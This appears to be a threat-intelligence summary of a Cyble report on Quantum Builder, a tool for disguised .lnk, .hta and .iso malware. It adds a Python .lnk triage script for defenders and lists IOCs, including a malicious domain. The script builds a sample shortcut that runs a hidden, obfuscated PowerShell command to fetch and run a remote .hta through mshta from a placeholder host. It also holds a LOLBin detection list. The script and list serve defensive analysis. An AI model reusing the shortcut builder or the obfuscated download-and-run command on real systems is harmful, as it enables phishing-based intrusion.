Cyble – Quantum Software: LNK File-based Builders Growing In Popularity

Cyble Research Labs highlights a rise in using Windows .lnk shortcut files to deliver payloads via LOLBins like PowerShell and mshta, including a new “Quantum Builder” tool that can create .lnk, .hta, and .iso-based payloads. The report also notes potential Lazarus APT links and details an infection chain, from LNK execution to deobfuscated PowerShell and remote-host mshta payloads. Hashtags: #QuantumSoftware #QuantumBuilder #LazarusAPT #LNK #MSDT #MSHTA #PowerShell #LOLBins #quantum-software.online

Keypoints

  • surge in use of Windows .lnk shortcut files by multiple malware families and APTs for payload delivery
  • Quantum Builder tool can spoof extensions and offers 300+ icons to disguise malicious .lnk files
  • builder workflow bundles .lnk/.hta/.iso generation and embeds payloads, including configurable options like UAC bypass and execution timing
  • attacker demonstrations show .hta payloads created via Quantum Builder and delivered through .lnk files
  • the MSDT-related “DogWalk” vulnerability is cited as another LOLBin-based delivery path, reached through specially crafted .diagcab files
  • observed similarities between Quantum Builder scripts and Lazarus APT techniques, suggesting potential links

MITRE Techniques

  • [T1566] Phishing – Initial Access via email-distributed .lnk/.hta/.iso payloads and malicious .diagcab files. Quote: “typically sent over emails by TAs.”
  • [T1204] User Execution – Nothing runs until the victim opens the attachment (the disguised .lnk, or the .diagcab file in the MSDT case); the report frames the MSDT zero-day as another LOLBin-based path needing the same user action. Quote: “the MSDT zero-day vulnerability, which researchers recently discovered, was also exploiting a LOLBin.”
  • [T1059] Command and Scripting Interpreter – Execution via PowerShell scripts deobfuscated and run as part of the payload. Quote: “The script uses a function that deobfuscates the malicious PowerShell script.”
  • [T1218] System Binary Proxy Execution – LOLBins like PowerShell and mshta used to proxy execution and evade detection. Quote: “Living off the Land Binaries are binaries that are native to Operating Systems such as PowerShell and mshta.”
  • [T1140] Deobfuscate/Decode Files or Information – The PowerShell payload is deobfuscated before execution. Quote: “The function performs a mathematical operation that converts a numeric value into characters.”
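As an added example (not code from the Cyble report, and not a Quantum Builder artifact), the following Python script parses a .lnk file's ShellLinkHeader and StringData far enough to recover the target, arguments, icon and ShowCommand, then applies the heuristics the key points and the T1059/T1140/T1218 chain suggest: a LOLBin target, a hidden window, a double extension, an icon borrowed from another binary, and a stage-2 mshta command hidden behind an integer-array obfuscation. The shortcut bytes, the `example.invalid` host, and the "integer array plus fixed offset" decoding scheme are constructed assumptions; the report says only that a function arithmetically converts numeric values into characters.

```python
"""Triage a Windows .lnk for the LOLBin tradecraft described above (added example).

Parses the Shell Link Binary File Format ([MS-SHLLINK]) far enough to recover
target, arguments, icon and ShowCommand, then applies detection heuristics.
The shortcut and the obfuscation scheme are CONSTRUCTED here, not real samples.
"""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) needed to walk the structures in order.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # launch minimized and unfocused: hides the console window
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe", "msdt.exe", "certutil.exe"}


def parse_lnk(data: bytes) -> dict:
    """Return header fields plus StringData; raise ValueError if not a Shell Link."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags, = struct.unpack_from("<I", data, 20)
    icon_index, show_cmd = struct.unpack_from("<iI", data, 56)
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize is its first field
        off += struct.unpack_from("<I", data, off)[0]
    out = {"flags": flags, "icon_index": icon_index, "show_command": show_cmd}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        out[key] = data[off:off + count * width].decode("utf-16-le" if width == 2 else "cp1252")
        off += count * width
    return out


_ARRAY = re.compile(r"\(((?:\d+\s*,\s*)+\d+)\)")
_OFFSET = re.compile(r"\[char\]\(\s*\$_\s*([+-])\s*(\d+)\s*\)", re.I)


def decode_numeric_array(script: str):
    """Undo an 'integer array, then [char]($_ +/- k)' obfuscation (ASSUMED general pattern)."""
    arr, op = _ARRAY.search(script), _OFFSET.search(script)
    if not (arr and op):
        return None
    delta = int(op.group(2)) * (1 if op.group(1) == "+" else -1)
    return "".join(chr(int(n) + delta) for n in arr.group(1).split(","))


def triage(data: bytes, filename: str) -> dict:
    """Parse the shortcut and return the findings a responder would want to see."""
    lnk = parse_lnk(data)
    target = lnk.get("relative_path", "").rsplit("\\", 1)[-1].lower()
    icon = lnk.get("icon_location", "").rsplit("\\", 1)[-1].lower()
    args = lnk.get("arguments", "")
    decoded = decode_numeric_array(args)
    findings = []
    if target in LOLBINS:
        findings.append(f"target is a LOLBin: {target}")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE or re.search(r"-w(indowstyle)?\s+hidden", args, re.I):
        findings.append("window hidden or minimized at launch")
    if re.search(r"\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.lnk$", filename, re.I):
        findings.append("double extension disguises the shortcut as a document")
    if icon and target and icon != target:
        findings.append(f"icon borrowed from another binary: {icon}")
    if re.search(r"mshta(\.exe)?\s+https?://", decoded or args, re.I):
        findings.append("stage 2 pulls a remote .hta through mshta")
    return {"lnk": lnk, "decoded": decoded, "findings": findings}


def build_sample_lnk() -> bytes:
    """CONSTRUCTED shortcut mimicking the reported chain (LNK -> PowerShell -> remote mshta)."""
    stage2 = "mshta http://example.invalid/remote/payload.hta"   # placeholder host, not the report's
    nums = ",".join(str(ord(c) + 7) for c in stage2)             # each char shifted by +7
    args = f'-w hidden -ep bypass -c "iex(-join(({nums})|%{{[char]($_-7)}}))"'
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    # ShellLinkHeader: size, CLSID, flags, attrs, 3 timestamps, filesize, icon index, showcmd, hotkey, reserved
    header = struct.pack("<I", 0x4C) + LINK_CLSID + struct.pack(
        "<IIQQQIiIH", flags, 0x20, 0, 0, 0, 0, 42, SW_SHOWMINNOACTIVE, 0) + b"\x00" * 10

    def sd(s: str) -> bytes:            # StringData: CountCharacters + UTF-16LE chars
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = sd(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
    body += sd(r"%SystemRoot%\System32") + sd(args) + sd(r"%SystemRoot%\System32\imageres.dll")
    return header + body + struct.pack("<I", 0)   # ExtraData TerminalBlock


if __name__ == "__main__":
    result = triage(build_sample_lnk(), "Invoice.pdf.lnk")
    print("target  :", result["lnk"]["relative_path"])
    print("decoded :", result["decoded"])
    for finding in result["findings"]:
        print(" -", finding)
```

The parser deliberately stops after StringData: the LinkTargetIDList and LinkInfo blocks are skipped by their own size fields, which is enough to reach the arguments without implementing the shell item formats. On a real triage the relative path can be absent (the target then lives only in the IDList), so treat a missing `relative_path` as "unknown target", not as benign.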

Indicators of Compromise

  • [MD5] Sample hashes cited in the report: 04e8a5c6e5797b0f436ca36452170a2f, 52b0b06ab4cf6c6b1a13d8eec2705e3b
  • [SHA-256] Sample hashes cited in the report: 2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25, b9899082824f1273e53cbf1d455f3608489388672d20b407338ffeecefc248f1
  • [Domain/URL] Malicious domain – quantum-software.online, contacted for the remote payload at quantum-software.online/remote/bdg.hta (and noted in related demo-site usage). Quote: “The sample mentioned in the above post connects to a domain named ‘quantum-software.online’.”

Read more: https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/